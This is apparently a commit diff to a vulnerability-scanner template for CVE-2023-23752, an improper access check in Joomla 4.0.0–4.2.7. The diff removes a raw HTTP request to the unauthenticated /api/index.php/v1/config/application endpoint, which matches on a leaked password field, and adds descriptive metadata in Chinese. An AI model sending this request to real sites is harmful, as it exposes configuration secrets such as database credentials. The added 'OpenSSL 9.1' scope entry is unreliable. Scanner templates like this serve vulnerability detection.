update cve/joomla/2023/yaml/CVE-2023-23752.yaml.

cve/joomla/2023/yaml/CVE-2023-23752.yaml

@@ -1,40 +1,22 @@
 id: CVE-2023-23752
-
+source:
+  https://github.com/Jenderal92/Joomla-CVE-2023-23752
 info:
   name: CVE-2023-23752-joomla
-  author: hakimi
-  severity: high
-  description: description
+  severity: medium
+  description: 
+    在Joomla！4.0.0至4.2.7中发现一个问题。一个不恰当的访问检查允许未经授权访问网络服务端点。
+  scope-of-influence:
+    Joomla! 4.0.0 through 4.2.7
+    OpenSSL 9.1
   reference:
-    - https://cve.report/CVE-2023-23752
-  tags: CVE-2023-23752
-
-requests:
-  - raw:
-      - |+
-        GET /api/index.php/v1/config/application?public=true HTTP/1.1
-        Host: {{Hostname}}
-        Cache-Control: max-age=0
-        Upgrade-Insecure-Requests: 1
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Encoding: gzip, deflate
-        Accept-Language: zh-CN,zh;q=0.9
-        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
-        Connection: close
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "links"
-          - '"password":'
-
-      - type: word
-        part: body
-        words:
-          - "attributes"
-
-      - type: status
-        status:
-          - 200
+    - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2023-23752
+    cwe-id: NVD-CWE-Other
+    cnvd-id: None
+    kve-id: None
+  tags:
+    - 非法访问